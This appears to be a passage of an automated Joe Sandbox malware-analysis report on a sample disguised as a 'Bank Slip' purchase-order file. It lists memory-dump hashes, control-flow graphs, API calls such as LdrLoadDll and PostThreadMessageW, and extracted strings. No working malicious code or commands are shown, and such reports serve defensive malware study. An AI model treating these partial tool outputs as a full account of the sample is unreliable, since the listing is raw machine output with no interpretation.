                                                                                                        • Source File: 00000000.00000002.1769043550.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_152d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                        • Instruction ID: 3977aa4eaa39ff36918d73b100e90d6b51b70afb856bd913c9243fea46fddf86
                                                                                                        • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                        • Instruction Fuzzy Hash: A211DF72404280CFDB12CF44D9C0B5ABF71FB84324F24C2A9D9094F256C33AE45ACBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769098529.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_153d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                        • Instruction ID: cf1cd5722b425cef9aa569823c019647f7ee3c57e8051b1a1a8b352e9d5244e4
                                                                                                        • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                        • Instruction Fuzzy Hash: E311BB75504280DFDB12CF54C5C0B19BBB1FB84224F24C6A9E8494F296C33AD40ACB61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769043550.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_152d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 778d42d26ea043926f31a7e440c5c134722fb32cf01bfd598b6e8317f216655e
                                                                                                        • Instruction ID: 03d2e210925b51e5c0a10abbc0c61d5dda9fc47af2cde75a9f0ff21353ce380d
                                                                                                        • Opcode Fuzzy Hash: 778d42d26ea043926f31a7e440c5c134722fb32cf01bfd598b6e8317f216655e
                                                                                                        • Instruction Fuzzy Hash: 7B0184730043949AE7219A5ACC84B66FFF8EF46760F1C895AED094E2C6D77D9840CA71
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769043550.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_152d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a7b391fae0af2415fbfdb8d150be88f21fb7d8dff8d44ff88c4feec17b79d0fb
                                                                                                        • Instruction ID: 9cfddd88ddbe402d9122ad2326a348a8b11d0261665a4d5d863fc30c9799f7bb
                                                                                                        • Opcode Fuzzy Hash: a7b391fae0af2415fbfdb8d150be88f21fb7d8dff8d44ff88c4feec17b79d0fb
                                                                                                        • Instruction Fuzzy Hash: E8F06273404394AEE7218A1ADC84B66FFA8EF52774F18C55AED084F2C7C3799844CAB1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TJyq$Tetq$xbwq
                                                                                                        • API String ID: 0-1363049387
                                                                                                        • Opcode ID: 4cc74d2f24a3e70600e4e6fe313a7fce0b0e1746ed303b8e6bde2648fb1943ab
                                                                                                        • Instruction ID: fa3296dbe18ad67ca82d6fa06bc8a56ee10ef0a55f37b3a7d8b87d9c371e3894
                                                                                                        • Opcode Fuzzy Hash: 4cc74d2f24a3e70600e4e6fe313a7fce0b0e1746ed303b8e6bde2648fb1943ab
                                                                                                        • Instruction Fuzzy Hash: BCC1BFB5E046688FDB19CF6AC9446DDBBF2AF89300F14C0EAD409AB364DA345E85CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1784215164.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7b30000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ce412fefd923508ecc3f9663b7d93a62cba6faaeaef952d8471566af2adc41ce
                                                                                                        • Instruction ID: 0979204647a71862cb91c507330effbf6a5980bd5eec707d2663c5710bc2fe73
                                                                                                        • Opcode Fuzzy Hash: ce412fefd923508ecc3f9663b7d93a62cba6faaeaef952d8471566af2adc41ce
                                                                                                        • Instruction Fuzzy Hash: 17029BF1A016199FEB19DFB9C8507AEBBF6FF89300F1044AAD1059B290DB34D986CB51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 06484873607dcb93a1078dcb5a329e3c40464d8b782a04443e408fa37fac1b5d
                                                                                                        • Instruction ID: fc304864663946f87f9a234612c6e375ffc6e571a0c1304ecb3dc59d1393f95e
                                                                                                        • Opcode Fuzzy Hash: 06484873607dcb93a1078dcb5a329e3c40464d8b782a04443e408fa37fac1b5d
                                                                                                        • Instruction Fuzzy Hash: F8E115B4E005198FCB14DFA9C5849AEBBB2FF89304F24C169D459AB355D730AD82CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ae4bc11ba674fea16c8898bad15b6c5f71537a0b283fb5244f8dca9ccb54ed5a
                                                                                                        • Instruction ID: e1b720354b6d6b70d7f391187262c7539cf4cf9b9d4b4d3872b8d72d4c7f0463
                                                                                                        • Opcode Fuzzy Hash: ae4bc11ba674fea16c8898bad15b6c5f71537a0b283fb5244f8dca9ccb54ed5a
                                                                                                        • Instruction Fuzzy Hash: B7E118B8E001598FCB14DFA9C5849AEFBB2FF89304F248169D415AB355D731AD82CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 47ca24a3daf242a957a2804e6c71b2e0aca4141ca7b22f08af8f221ab7fda496
                                                                                                        • Instruction ID: dbc778d5573751f4b0db353fbc8766dfc4657eec87cb691646427d064cd58f4d
                                                                                                        • Opcode Fuzzy Hash: 47ca24a3daf242a957a2804e6c71b2e0aca4141ca7b22f08af8f221ab7fda496
                                                                                                        • Instruction Fuzzy Hash: 5DE117B8E101598FCB14DFA9C5849AEFBB2FF89301F248169D415AB355D731AD82CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8af5dd0e4f6c497250864e3b85b82d26207483ed3346bf75672af7c09c652166
                                                                                                        • Instruction ID: f9ed0d589cc5cc1228d05c9de4f432a6c6c5c31bdfa2e06a8e1318eede2eb8f4
                                                                                                        • Opcode Fuzzy Hash: 8af5dd0e4f6c497250864e3b85b82d26207483ed3346bf75672af7c09c652166
                                                                                                        • Instruction Fuzzy Hash: 54E117B4E005598FCB14DFA9C5849AEBBB2FF89304F24C169D455AB355D730AD82CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 006a00a1cbbd1db06e8255acc15dc334926784e3d7b864976265661359a63732
                                                                                                        • Instruction ID: 1ed342b2012f58493cb866f797ac3a1eb27d0a6a0bbe576657cc0dfb6362e71d
                                                                                                        • Opcode Fuzzy Hash: 006a00a1cbbd1db06e8255acc15dc334926784e3d7b864976265661359a63732
                                                                                                        • Instruction Fuzzy Hash: 49E118B4E005599FCB14DFA9C5849AEFBB2FF89304F248169D459AB355C730AD82CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 24a03414ae77949d0843e7e1d63fee0be1c4c4db783557a4a1b1a7db12371806
                                                                                                        • Instruction ID: afceeaaad900cd6c3fb5ad0d8e3e3f3b60de66249b8ff85ab84153d50cc1a352
                                                                                                        • Opcode Fuzzy Hash: 24a03414ae77949d0843e7e1d63fee0be1c4c4db783557a4a1b1a7db12371806
                                                                                                        • Instruction Fuzzy Hash: 00D10AB5D09259CFDB14CFA5C8887DEBBF2FB8A304F4091A9D40AA7240DB745A86CF51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 78242a90bb4b1d8aea78fb6beefe6d2be94c93d499087f355877a3c5ef8d9835
                                                                                                        • Instruction ID: d8e8bef7f8bf24f0966d2aea2e2befc2850a5ea2fe543ae5948e16c3983e9f0a
                                                                                                        • Opcode Fuzzy Hash: 78242a90bb4b1d8aea78fb6beefe6d2be94c93d499087f355877a3c5ef8d9835
                                                                                                        • Instruction Fuzzy Hash: 5BD11B31C2075A8ACB50EBA5D99069DB7B1FF99300F20CB9AE4097B250FB746AD4CF51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 06c1d7726726b466a45ec1ec18fdc4a13040ccc471ff9355729f8138ee4e81f9
                                                                                                        • Instruction ID: 795f1784e6d3341a0b8058060c5296f7d31688e136f9cac4f2a36b3f7ce994f9
                                                                                                        • Opcode Fuzzy Hash: 06c1d7726726b466a45ec1ec18fdc4a13040ccc471ff9355729f8138ee4e81f9
                                                                                                        • Instruction Fuzzy Hash: 7FA17D36E00209CFCF15DFB4D84099EBBB2FF85740B15866AEA01AB265DB71E916CF40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:1.2%
                                                                                                        Dynamic/Decrypted Code Coverage:5.1%
                                                                                                        Signature Coverage:8%
                                                                                                        Total number of Nodes:137
                                                                                                        Total number of Limit Nodes:11

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 177 417563-41757f 178 417587-41758c 177->178 179 417582 call 42f153 177->179 180 417592-4175a0 call 42f753 178->180 181 41758e-417591 178->181 179->178 184 4175b0-4175c1 call 42dbc3 180->184 185 4175a2-4175ad call 42f9f3 180->185 190 4175c3-4175d7 LdrLoadDll 184->190 191 4175da-4175dd 184->191 185->184 190->191
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 219 42c433-42c46c call 404713 call 42d6b3 NtClose
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C467
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 413d7a-413d89 1 413df9-413e04 0->1 2 413d8b-413da4 0->2 3 413e06-413e0b 1->3 4 413e6e-413e73 1->4 5 413d43-413d65 2->5 6 413da6-413db1 2->6 7 413e0c-413e0e 3->7 8 413e75-413e7d 4->8 9 413edb 4->9 10 413d67-413d78 5->10 11 413d1d 5->11 12 413db3 6->12 13 413dcd-413dec 6->13 15 413e9d-413ea3 8->15 16 413e7f-413e8e PostThreadMessageW 8->16 17 413ee9-413eec 9->17 18 413edd-413ee3 9->18 11->5 12->13 23 413df0-413df8 13->23 24 413dee 13->24 16->15 20 413e90-413e9a 16->20 21 413ee5-413ee8 18->21 22 413ebb-413ebf 18->22 20->15 22->18 25 413ec1-413ec6 22->25 23->1 24->7 24->23 25->18 26 413ec8-413ecd 25->26 26->18 27 413ecf-413ed6 26->27 27->17 29 413ed8 27->29 29->9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Ea64OHKq$Ea64OHKq
                                                                                                        • API String ID: 0-1999359540

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: Ea64OHKq$Ea64OHKq
                                                                                                        • API String ID: 1836367815-1999359540

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 44 413e13-413e25 45 413e2d-413e7d call 42f023 call 417563 call 404683 call 424c83 44->45 46 413e28 call 42e613 44->46 55 413e9d-413ea3 45->55 56 413e7f-413e8e PostThreadMessageW 45->56 46->45 56->55 57 413e90-413e9a 56->57 57->55
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: Ea64OHKq$Ea64OHKq
                                                                                                        • API String ID: 1836367815-1999359540

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 193 41760f-417610 194 417612-417623 193->194 195 41759b-4175a0 193->195 196 4175b0-4175c1 call 42dbc3 195->196 197 4175a2-4175ad call 42f9f3 195->197 202 4175c3-4175d0 196->202 203 4175da-4175dd 196->203 197->196 204 4175d1-4175d7 LdrLoadDll 202->204 204->203
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 205 417624-417632 206 4175d1-4175d7 LdrLoadDll 205->206 207 417634-417671 205->207 208 4175da-4175dd 206->208
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 209 42c763-42c7a7 call 404713 call 42d6b3 RtlAllocateHeap
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,0041E354,?,?,00000000,?,0041E354,?,?,?), ref: 0042C7A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 214 42c7b3-42c7f4 call 404713 call 42d6b3 RtlFreeHeap
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,9403D333,00000007,00000000,00000004,00000000,00416E48,000000F4), ref: 0042C7EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 224 42c803-42c83c call 404713 call 42d6b3 ExitProcess
                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,355104C2,?,?,355104C2), ref: 0042C837
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 229 17d2c0a-17d2c0f 230 17d2c1f-17d2c26 LdrInitializeThunk 229->230 231 17d2c11-17d2c18 229->231
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2160512332
                                                                                                        Strings
                                                                                                        • Critical section address., xrefs: 01805502
                                                                                                        • Thread identifier, xrefs: 0180553A
                                                                                                        • corrupted critical section, xrefs: 018054C2
                                                                                                        • Address of the debug info found in the active list., xrefs: 018054AE, 018054FA
                                                                                                        • undeleted critical section in freed memory, xrefs: 0180542B
                                                                                                        • Invalid debug info address of this critical section, xrefs: 018054B6
                                                                                                        • Critical section address, xrefs: 01805425, 018054BC, 01805534
                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0180540A, 01805496, 01805519
                                                                                                        • double initialized or corrupted critical section, xrefs: 01805508
                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054CE
                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054E2
                                                                                                        • 8, xrefs: 018052E3
                                                                                                        • Critical section debug info address, xrefs: 0180541F, 0180552E
                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01805543
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                        • API String ID: 0-2368682639
                                                                                                        Strings
                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0180261F
                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018022E4
                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01802506
                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018024C0
                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01802409
                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01802624
                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01802498
                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01802602
                                                                                                        • @, xrefs: 0180259B
                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01802412
                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018025EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                        • API String ID: 0-4009184096
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                        • API String ID: 0-2515994595
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
